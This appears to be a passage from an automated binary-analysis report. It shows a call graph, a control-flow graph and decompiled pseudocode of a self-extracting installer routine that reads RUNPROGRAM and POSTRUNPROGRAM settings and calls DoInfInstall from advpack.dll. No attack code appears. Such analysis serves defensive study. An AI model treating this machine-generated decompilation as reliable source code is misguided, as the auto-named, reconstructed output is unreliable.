                                                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                                                      • Disassembly available
                                                                                                                                                                                                      callgraph 0 Function_000E490C 1 Function_000E7208 2 Function_000E4702 57 Function_000E1680 2->57 83 Function_000E16B3 2->83 3 Function_000E6C03 26 Function_000E724D 3->26 4 Function_000E7000 5 Function_000E4200 6 Function_000E3100 95 Function_000E43D0 6->95 7 Function_000E171E 8 Function_000E621E 45 Function_000E597D 8->45 55 Function_000E6285 8->55 81 Function_000E44B9 8->81 108 Function_000E6CE0 8->108 9 Function_000E681F 9->108 116 Function_000E66F9 9->116 10 Function_000E2F1D 10->8 18 Function_000E3B26 10->18 22 Function_000E3A3F 10->22 34 Function_000E256D 10->34 36 Function_000E4169 10->36 39 Function_000E5164 10->39 51 Function_000E658A 10->51 10->55 73 Function_000E3BA2 10->73 77 Function_000E55A0 10->77 10->81 105 Function_000E51E5 10->105 10->108 11 Function_000E411B 71 Function_000E1EA7 11->71 12 Function_000E5C17 13 Function_000E6517 13->81 14 Function_000E3210 19 Function_000E4224 14->19 14->45 14->51 14->81 85 Function_000E58C8 14->85 14->95 15 Function_000E7010 16 Function_000E6E2A 117 Function_000E6CF0 16->117 17 Function_000E202A 17->7 17->51 17->81 17->108 18->13 62 Function_000E6298 18->62 106 Function_000E4FE0 18->106 19->57 19->81 20 Function_000E7120 21 Function_000E6A20 22->13 50 Function_000E468F 22->50 22->55 22->81 23 Function_000E6C3F 24 Function_000E4C37 25 Function_000E2630 25->81 25->108 27 Function_000E6648 28 Function_000E6F40 29 Function_000E6F54 29->1 29->26 30 Function_000E7155 31 Function_000E6952 32 Function_000E4A50 33 Function_000E3450 33->95 107 Function_000E24E0 34->107 35 Function_000E476D 35->13 68 Function_000E66AE 35->68 36->50 36->81 37 Function_000E5467 37->45 37->51 37->55 37->57 60 Function_000E1781 37->60 78 Function_000E53A1 37->78 37->85 37->108 38 Function_000E2267 38->7 38->51 38->108 39->50 39->62 39->81 40 Function_000E4B60 41 Function_000E6A60 41->1 41->23 41->26 41->30 42 Function_000E7060 41->42 115 Function_000E2BFB 41->115 42->15 42->20 43 Function_000E6760 44 Function_000E667F 44->27 52 Function_000E268B 45->52 45->55 45->81 45->108 46 Function_000E487A 46->0 47 Function_000E2773 47->51 47->57 47->60 47->108 48 Function_000E7270 49 Function_000E6C70 51->83 52->7 52->81 52->108 53 Function_000E2A89 54 Function_000E1A84 54->44 56 Function_000E4980 56->46 56->81 57->60 58 Function_000E3680 59 Function_000E6380 61 Function_000E5C9E 61->12 61->16 61->44 61->51 61->57 61->81 86 Function_000E66C8 61->86 61->108 109 Function_000E31E0 61->109 62->7 62->108 63 Function_000E4E99 63->57 64 Function_000E6495 64->51 64->60 64->108 65 Function_000E6793 66 Function_000E2390 66->51 66->57 66->66 66->83 66->108 67 Function_000E1F90 67->71 67->81 67->108 69 Function_000E2AAC 69->57 87 Function_000E17C8 69->87 104 Function_000E65E8 69->104 69->108 70 Function_000E2CAA 70->13 70->50 70->61 70->66 75 Function_000E18A3 70->75 70->81 96 Function_000E36EE 70->96 70->108 71->34 72 Function_000E6FA5 72->26 73->17 73->38 73->50 73->55 73->60 73->64 73->81 98 Function_000E3FEF 73->98 102 Function_000E1AE8 73->102 73->108 74 Function_000E72A2 97 Function_000E17EE 75->97 75->108 76 Function_000E4CA0 77->13 77->25 77->31 77->37 77->45 77->50 77->51 77->55 77->60 77->81 77->108 78->7 78->51 78->57 78->108 79 Function_000E6FA1 80 Function_000E6FBE 80->29 81->7 81->9 81->57 88 Function_000E67C9 81->88 81->108 82 Function_000E52B6 82->60 82->66 82->104 82->108 112 Function_000E1FE1 82->112 83->60 84 Function_000E69B0 84->4 84->49 84->80 99 Function_000E71EF 84->99 85->51 85->55 85->57 85->81 86->27 88->65 89 Function_000E4CC0 90 Function_000E4BC0 91 Function_000E30C0 92 Function_000E63C0 92->51 92->60 92->108 93 Function_000E4AD0 93->58 94 Function_000E4CD0 94->2 94->24 94->35 94->40 94->56 94->63 94->108 110 Function_000E47E0 94->110 95->108 96->9 96->53 96->81 96->88 103 Function_000E28E8 96->103 96->108 97->108 98->11 98->55 98->81 98->108 100 Function_000E6BEF 101 Function_000E70EB 102->7 102->51 102->54 102->57 102->60 102->69 102->81 102->83 102->86 102->108 103->47 103->53 105->50 105->55 105->81 106->50 106->81 114 Function_000E4EFD 106->114 107->51 107->108 108->117 110->57 110->81 111 Function_000E19E0 111->95 111->108 113 Function_000E70FE 114->40 114->56 114->108 115->10 115->67 115->70 115->82 118 Function_000E34F0 118->58 118->81 118->95 119 Function_000E6EF0

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 36 e3ba2-e3bd9 37 e3bfd-e3bff 36->37 38 e3bdb-e3bee call e468f 36->38 40 e3c03-e3c28 memset 37->40 44 e3bf4-e3bf7 38->44 45 e3d13-e3d30 call e44b9 38->45 42 e3c2e-e3c40 call e468f 40->42 43 e3d35-e3d48 call e1781 40->43 42->45 54 e3c46-e3c49 42->54 49 e3d4d-e3d52 43->49 44->37 44->45 55 e3f4d 45->55 52 e3d9e-e3db6 call e1ae8 49->52 53 e3d54-e3d6c call e468f 49->53 52->55 66 e3dbc-e3dc2 52->66 53->45 68 e3d6e-e3d75 53->68 54->45 57 e3c4f-e3c56 54->57 60 e3f4f-e3f63 call e6ce0 55->60 62 e3c58-e3c5e 57->62 63 e3c60-e3c65 57->63 69 e3c6e-e3c73 62->69 64 e3c67-e3c6d 63->64 65 e3c75-e3c7c 63->65 64->69 72 e3c87-e3c89 65->72 73 e3c7e-e3c82 65->73 70 e3de6-e3de8 66->70 71 e3dc4-e3dce 66->71 75 e3fda-e3fe1 68->75 76 e3d7b-e3d98 CompareStringA 68->76 69->72 79 e3dee-e3df5 70->79 80 e3f0b-e3f15 call e3fef 70->80 71->70 77 e3dd0-e3dd7 71->77 72->49 78 e3c8f-e3c98 72->78 73->72 81 e3fe8-e3fea 75->81 82 e3fe3 call e2267 75->82 76->52 76->75 77->70 84 e3dd9-e3ddb 77->84 85 e3c9a-e3c9c 78->85 86 e3cf1-e3cf3 78->86 87 e3fab-e3fd2 call e44b9 LocalFree 79->87 88 e3dfb-e3dfd 79->88 91 e3f1a-e3f1c 80->91 81->60 82->81 84->79 92 e3ddd-e3de1 call e202a 84->92 94 e3c9e-e3ca3 85->94 95 e3ca5-e3ca7 85->95 86->52 90 e3cf9-e3d11 call e468f 86->90 87->55 88->80 96 e3e03-e3e0a 88->96 90->45 90->49 98 e3f1e-e3f2d LocalFree 91->98 99 e3f46-e3f47 LocalFree 91->99 92->70 102 e3cb2-e3cc5 call e468f 94->102 95->55 103 e3cad 95->103 96->80 104 e3e10-e3e19 call e6495 96->104 106 e3fd7-e3fd9 98->106 107 e3f33-e3f3b 98->107 99->55 102->45 112 e3cc7-e3ce8 CompareStringA 102->112 103->102 113 e3e1f-e3e36 GetProcAddress 104->113 114 e3f92-e3fa9 call e44b9 104->114 106->75 107->40 112->86 116 e3cea-e3ced 112->116 117 e3e3c-e3e80 113->117 118 e3f64-e3f76 call e44b9 FreeLibrary 113->118 125 e3f7c-e3f90 LocalFree call e6285 114->125 116->86 119 e3e8b-e3e94 117->119 120 e3e82-e3e87 117->120 118->125 123 e3e9f-e3ea2 119->123 124 e3e96-e3e9b 119->124 120->119 128 e3ead-e3eb6 123->128 129 e3ea4-e3ea9 123->129 124->123 125->55 131 e3eb8-e3ebd 128->131 132 e3ec1-e3ec3 128->132 129->128 131->132 133 e3ece-e3eec 132->133 134 e3ec5-e3eca 132->134 137 e3eee-e3ef3 133->137 138 e3ef5-e3efd 133->138 134->133 137->138 139 e3eff-e3f09 FreeLibrary 138->139 140 e3f40 FreeLibrary 138->140 139->98 140->99
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E000E3BA2() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v280;
                                                                                                                                                                                                      				short _v300;
                                                                                                                                                                                                      				intOrPtr _v304;
                                                                                                                                                                                                      				void _v348;
                                                                                                                                                                                                      				char _v352;
                                                                                                                                                                                                      				intOrPtr _v356;
                                                                                                                                                                                                      				signed int _v360;
                                                                                                                                                                                                      				short _v364;
                                                                                                                                                                                                      				char* _v368;
                                                                                                                                                                                                      				intOrPtr _v372;
                                                                                                                                                                                                      				void* _v376;
                                                                                                                                                                                                      				intOrPtr _v380;
                                                                                                                                                                                                      				char _v384;
                                                                                                                                                                                                      				signed int _v388;
                                                                                                                                                                                                      				intOrPtr _v392;
                                                                                                                                                                                                      				signed int _v396;
                                                                                                                                                                                                      				signed int _v400;
                                                                                                                                                                                                      				signed int _v404;
                                                                                                                                                                                                      				void* _v408;
                                                                                                                                                                                                      				void* _v424;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                      				void* _t77;
                                                                                                                                                                                                      				signed int _t79;
                                                                                                                                                                                                      				short _t96;
                                                                                                                                                                                                      				signed int _t97;
                                                                                                                                                                                                      				intOrPtr _t98;
                                                                                                                                                                                                      				signed int _t101;
                                                                                                                                                                                                      				signed int _t104;
                                                                                                                                                                                                      				signed int _t108;
                                                                                                                                                                                                      				int _t112;
                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                      				signed char _t118;
                                                                                                                                                                                                      				void* _t125;
                                                                                                                                                                                                      				signed int _t127;
                                                                                                                                                                                                      				void* _t128;
                                                                                                                                                                                                      				struct HINSTANCE__* _t129;
                                                                                                                                                                                                      				void* _t130;
                                                                                                                                                                                                      				short _t137;
                                                                                                                                                                                                      				char* _t140;
                                                                                                                                                                                                      				signed char _t144;
                                                                                                                                                                                                      				signed char _t145;
                                                                                                                                                                                                      				signed int _t149;
                                                                                                                                                                                                      				void* _t150;
                                                                                                                                                                                                      				void* _t151;
                                                                                                                                                                                                      				signed int _t153;
                                                                                                                                                                                                      				void* _t155;
                                                                                                                                                                                                      				void* _t156;
                                                                                                                                                                                                      				signed int _t157;
                                                                                                                                                                                                      				signed int _t162;
                                                                                                                                                                                                      				signed int _t164;
                                                                                                                                                                                                      				void* _t165;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                      				_t69 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                      				_t153 = 0;
                                                                                                                                                                                                      				 *0xe9124 =  *0xe9124 & 0;
                                                                                                                                                                                                      				_t149 = 0;
                                                                                                                                                                                                      				_v388 = 0;
                                                                                                                                                                                                      				_v384 = 0;
                                                                                                                                                                                                      				_t165 =  *0xe8a28 - _t153; // 0x0
                                                                                                                                                                                                      				if(_t165 != 0) {
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t127 = 0;
                                                                                                                                                                                                      					_v392 = 0;
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                      						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                      						_t164 = _t164 + 0xc;
                                                                                                                                                                                                      						_v348 = 0x44;
                                                                                                                                                                                                      						if( *0xe8c42 != 0) {
                                                                                                                                                                                                      							goto L26;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t146 =  &_v396;
                                                                                                                                                                                                      						_t115 = E000E468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                      						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                      							L25:
                                                                                                                                                                                                      							_t146 = 0x4b1;
                                                                                                                                                                                                      							E000E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      							 *0xe9124 = 0x80070714;
                                                                                                                                                                                                      							goto L62;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							if(_v396 != 1) {
                                                                                                                                                                                                      								__eflags = _v396 - 2;
                                                                                                                                                                                                      								if(_v396 != 2) {
                                                                                                                                                                                                      									_t137 = 3;
                                                                                                                                                                                                      									__eflags = _v396 - _t137;
                                                                                                                                                                                                      									if(_v396 == _t137) {
                                                                                                                                                                                                      										_v304 = 1;
                                                                                                                                                                                                      										_v300 = _t137;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L14;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_push(6);
                                                                                                                                                                                                      								_v304 = 1;
                                                                                                                                                                                                      								_pop(0);
                                                                                                                                                                                                      								goto L11;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_v304 = 1;
                                                                                                                                                                                                      								L11:
                                                                                                                                                                                                      								_v300 = 0;
                                                                                                                                                                                                      								L14:
                                                                                                                                                                                                      								if(_t127 != 0) {
                                                                                                                                                                                                      									L27:
                                                                                                                                                                                                      									_t155 = 1;
                                                                                                                                                                                                      									__eflags = _t127 - 1;
                                                                                                                                                                                                      									if(_t127 != 1) {
                                                                                                                                                                                                      										L31:
                                                                                                                                                                                                      										_t132 =  &_v280;
                                                                                                                                                                                                      										_t76 = E000E1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                      										__eflags = _t76;
                                                                                                                                                                                                      										if(_t76 == 0) {
                                                                                                                                                                                                      											L62:
                                                                                                                                                                                                      											_t77 = 0;
                                                                                                                                                                                                      											L63:
                                                                                                                                                                                                      											_pop(_t150);
                                                                                                                                                                                                      											_pop(_t156);
                                                                                                                                                                                                      											_pop(_t128);
                                                                                                                                                                                                      											return E000E6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t157 = _v404;
                                                                                                                                                                                                      										__eflags = _t149;
                                                                                                                                                                                                      										if(_t149 != 0) {
                                                                                                                                                                                                      											L37:
                                                                                                                                                                                                      											__eflags = _t157;
                                                                                                                                                                                                      											if(_t157 == 0) {
                                                                                                                                                                                                      												L57:
                                                                                                                                                                                                      												_t151 = _v408;
                                                                                                                                                                                                      												_t146 =  &_v352;
                                                                                                                                                                                                      												_t130 = _t151; // executed
                                                                                                                                                                                                      												_t79 = E000E3FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                      												__eflags = _t79;
                                                                                                                                                                                                      												if(_t79 == 0) {
                                                                                                                                                                                                      													L61:
                                                                                                                                                                                                      													LocalFree(_t151);
                                                                                                                                                                                                      													goto L62;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												L58:
                                                                                                                                                                                                      												LocalFree(_t151);
                                                                                                                                                                                                      												_t127 = _t127 + 1;
                                                                                                                                                                                                      												_v396 = _t127;
                                                                                                                                                                                                      												__eflags = _t127 - 2;
                                                                                                                                                                                                      												if(_t127 >= 2) {
                                                                                                                                                                                                      													_t155 = 1;
                                                                                                                                                                                                      													__eflags = 1;
                                                                                                                                                                                                      													L69:
                                                                                                                                                                                                      													__eflags =  *0xe8580;
                                                                                                                                                                                                      													if( *0xe8580 != 0) {
                                                                                                                                                                                                      														E000E2267();
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													_t77 = _t155;
                                                                                                                                                                                                      													goto L63;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t153 = _v392;
                                                                                                                                                                                                      												_t149 = _v388;
                                                                                                                                                                                                      												continue;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											L38:
                                                                                                                                                                                                      											__eflags =  *0xe8180;
                                                                                                                                                                                                      											if( *0xe8180 == 0) {
                                                                                                                                                                                                      												_t146 = 0x4c7;
                                                                                                                                                                                                      												E000E44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                      												LocalFree(_v424);
                                                                                                                                                                                                      												 *0xe9124 = 0x8007042b;
                                                                                                                                                                                                      												goto L62;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t157;
                                                                                                                                                                                                      											if(_t157 == 0) {
                                                                                                                                                                                                      												goto L57;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *0xe9a34 & 0x00000004;
                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                      												goto L57;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t129 = E000E6495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                      											__eflags = _t129;
                                                                                                                                                                                                      											if(_t129 == 0) {
                                                                                                                                                                                                      												_t146 = 0x4c8;
                                                                                                                                                                                                      												E000E44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                      												L65:
                                                                                                                                                                                                      												LocalFree(_v408);
                                                                                                                                                                                                      												 *0xe9124 = E000E6285();
                                                                                                                                                                                                      												goto L62;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                      											_v404 = _t146;
                                                                                                                                                                                                      											__eflags = _t146;
                                                                                                                                                                                                      											if(_t146 == 0) {
                                                                                                                                                                                                      												_t146 = 0x4c9;
                                                                                                                                                                                                      												__eflags = 0;
                                                                                                                                                                                                      												E000E44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                      												FreeLibrary(_t129);
                                                                                                                                                                                                      												goto L65;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *0xe8a30;
                                                                                                                                                                                                      											_t151 = _v408;
                                                                                                                                                                                                      											_v384 = 0;
                                                                                                                                                                                                      											_v368 =  &_v280;
                                                                                                                                                                                                      											_t96 =  *0xe9a40; // 0x3
                                                                                                                                                                                                      											_v364 = _t96;
                                                                                                                                                                                                      											_t97 =  *0xe8a38 & 0x0000ffff;
                                                                                                                                                                                                      											_v380 = 0xe9154;
                                                                                                                                                                                                      											_v376 = _t151;
                                                                                                                                                                                                      											_v372 = 0xe91e4;
                                                                                                                                                                                                      											_v360 = _t97;
                                                                                                                                                                                                      											if( *0xe8a30 != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t144 =  *0xe9a34; // 0x1
                                                                                                                                                                                                      											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                      											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                      											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t145 =  *0xe8d48; // 0x0
                                                                                                                                                                                                      											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                      											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t145;
                                                                                                                                                                                                      											if(_t145 < 0) {
                                                                                                                                                                                                      												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                      												__eflags = _t104;
                                                                                                                                                                                                      												_v360 = _t104;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t98 =  *0xe9a38; // 0x0
                                                                                                                                                                                                      											_v356 = _t98;
                                                                                                                                                                                                      											_t130 = _t146;
                                                                                                                                                                                                      											 *0xea288( &_v384);
                                                                                                                                                                                                      											_t101 = _v404();
                                                                                                                                                                                                      											__eflags = _t164 - _t164;
                                                                                                                                                                                                      											if(_t164 != _t164) {
                                                                                                                                                                                                      												_t130 = 4;
                                                                                                                                                                                                      												asm("int 0x29");
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											 *0xe9124 = _t101;
                                                                                                                                                                                                      											_push(_t129);
                                                                                                                                                                                                      											__eflags = _t101;
                                                                                                                                                                                                      											if(_t101 < 0) {
                                                                                                                                                                                                      												FreeLibrary();
                                                                                                                                                                                                      												goto L61;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												FreeLibrary();
                                                                                                                                                                                                      												_t127 = _v400;
                                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags =  *0xe9a40 - 1; // 0x3
                                                                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                                                                      											goto L37;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags =  *0xe8a20;
                                                                                                                                                                                                      										if( *0xe8a20 == 0) {
                                                                                                                                                                                                      											goto L37;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t157;
                                                                                                                                                                                                      										if(_t157 != 0) {
                                                                                                                                                                                                      											goto L38;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_v388 = 1;
                                                                                                                                                                                                      										E000E202A(_t146); // executed
                                                                                                                                                                                                      										goto L37;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t146 =  &_v280;
                                                                                                                                                                                                      									_t108 = E000E468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                      									__eflags = _t108;
                                                                                                                                                                                                      									if(_t108 == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags =  *0xe8c42;
                                                                                                                                                                                                      									if( *0xe8c42 != 0) {
                                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                      									__eflags = _t112 == 0;
                                                                                                                                                                                                      									if(_t112 == 0) {
                                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L31;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t118 =  *0xe8a38; // 0x0
                                                                                                                                                                                                      								if(_t118 == 0) {
                                                                                                                                                                                                      									L23:
                                                                                                                                                                                                      									if(_t153 != 0) {
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t146 =  &_v276;
                                                                                                                                                                                                      									if(E000E468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                      										goto L27;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L25;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                      									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                      									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                      										goto L62;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t140 = "USRQCMD";
                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                      									_t146 =  &_v276;
                                                                                                                                                                                                      									if(E000E468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                      										_t153 = 1;
                                                                                                                                                                                                      										_v388 = 1;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t140 = "ADMQCMD";
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L26:
                                                                                                                                                                                                      						_push(_t130);
                                                                                                                                                                                                      						_t146 = 0x104;
                                                                                                                                                                                                      						E000E1781( &_v276, 0x104, _t130, 0xe8c42);
                                                                                                                                                                                                      						goto L27;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t130 = "REBOOT";
                                                                                                                                                                                                      				_t125 = E000E468F(_t130, 0xe9a2c, 4);
                                                                                                                                                                                                      				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                      					goto L25;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





























































                                                                                                                                                                                                      0x000e3baa
                                                                                                                                                                                                      0x000e3bb0
                                                                                                                                                                                                      0x000e3bb7
                                                                                                                                                                                                      0x000e3bc0
                                                                                                                                                                                                      0x000e3bc2
                                                                                                                                                                                                      0x000e3bc9
                                                                                                                                                                                                      0x000e3bcb
                                                                                                                                                                                                      0x000e3bcf
                                                                                                                                                                                                      0x000e3bd3
                                                                                                                                                                                                      0x000e3bd9
                                                                                                                                                                                                      0x000e3bfd
                                                                                                                                                                                                      0x000e3bfd
                                                                                                                                                                                                      0x000e3bff
                                                                                                                                                                                                      0x000e3c03
                                                                                                                                                                                                      0x000e3c03
                                                                                                                                                                                                      0x000e3c11
                                                                                                                                                                                                      0x000e3c16
                                                                                                                                                                                                      0x000e3c19
                                                                                                                                                                                                      0x000e3c28
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3c30
                                                                                                                                                                                                      0x000e3c39
                                                                                                                                                                                                      0x000e3c40
                                                                                                                                                                                                      0x000e3d13
                                                                                                                                                                                                      0x000e3d15
                                                                                                                                                                                                      0x000e3d21
                                                                                                                                                                                                      0x000e3d26
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3c4f
                                                                                                                                                                                                      0x000e3c56
                                                                                                                                                                                                      0x000e3c60
                                                                                                                                                                                                      0x000e3c65
                                                                                                                                                                                                      0x000e3c77
                                                                                                                                                                                                      0x000e3c78
                                                                                                                                                                                                      0x000e3c7c
                                                                                                                                                                                                      0x000e3c7e
                                                                                                                                                                                                      0x000e3c82
                                                                                                                                                                                                      0x000e3c82
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3c7c
                                                                                                                                                                                                      0x000e3c67
                                                                                                                                                                                                      0x000e3c69
                                                                                                                                                                                                      0x000e3c6d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3c58
                                                                                                                                                                                                      0x000e3c58
                                                                                                                                                                                                      0x000e3c6e
                                                                                                                                                                                                      0x000e3c6e
                                                                                                                                                                                                      0x000e3c87
                                                                                                                                                                                                      0x000e3c89
                                                                                                                                                                                                      0x000e3d4d
                                                                                                                                                                                                      0x000e3d4f
                                                                                                                                                                                                      0x000e3d50
                                                                                                                                                                                                      0x000e3d52
                                                                                                                                                                                                      0x000e3d9e
                                                                                                                                                                                                      0x000e3da8
                                                                                                                                                                                                      0x000e3daf
                                                                                                                                                                                                      0x000e3db4
                                                                                                                                                                                                      0x000e3db6
                                                                                                                                                                                                      0x000e3f4d
                                                                                                                                                                                                      0x000e3f4d
                                                                                                                                                                                                      0x000e3f4f
                                                                                                                                                                                                      0x000e3f56
                                                                                                                                                                                                      0x000e3f57
                                                                                                                                                                                                      0x000e3f58
                                                                                                                                                                                                      0x000e3f63
                                                                                                                                                                                                      0x000e3f63
                                                                                                                                                                                                      0x000e3dbc
                                                                                                                                                                                                      0x000e3dc0
                                                                                                                                                                                                      0x000e3dc2
                                                                                                                                                                                                      0x000e3de6
                                                                                                                                                                                                      0x000e3de6
                                                                                                                                                                                                      0x000e3de8
                                                                                                                                                                                                      0x000e3f0b
                                                                                                                                                                                                      0x000e3f0b
                                                                                                                                                                                                      0x000e3f0f
                                                                                                                                                                                                      0x000e3f13
                                                                                                                                                                                                      0x000e3f15
                                                                                                                                                                                                      0x000e3f1a
                                                                                                                                                                                                      0x000e3f1c
                                                                                                                                                                                                      0x000e3f46
                                                                                                                                                                                                      0x000e3f47
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3f47
                                                                                                                                                                                                      0x000e3f1e
                                                                                                                                                                                                      0x000e3f1f
                                                                                                                                                                                                      0x000e3f25
                                                                                                                                                                                                      0x000e3f26
                                                                                                                                                                                                      0x000e3f2a
                                                                                                                                                                                                      0x000e3f2d
                                                                                                                                                                                                      0x000e3fd9
                                                                                                                                                                                                      0x000e3fd9
                                                                                                                                                                                                      0x000e3fda
                                                                                                                                                                                                      0x000e3fda
                                                                                                                                                                                                      0x000e3fe1
                                                                                                                                                                                                      0x000e3fe3
                                                                                                                                                                                                      0x000e3fe3
                                                                                                                                                                                                      0x000e3fe8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3fe8
                                                                                                                                                                                                      0x000e3f33
                                                                                                                                                                                                      0x000e3f37
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3f37
                                                                                                                                                                                                      0x000e3dee
                                                                                                                                                                                                      0x000e3dee
                                                                                                                                                                                                      0x000e3df5
                                                                                                                                                                                                      0x000e3fad
                                                                                                                                                                                                      0x000e3fb9
                                                                                                                                                                                                      0x000e3fc2
                                                                                                                                                                                                      0x000e3fc8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3fc8
                                                                                                                                                                                                      0x000e3dfb
                                                                                                                                                                                                      0x000e3dfd
                                                                                                                                                                                                      0x00000000
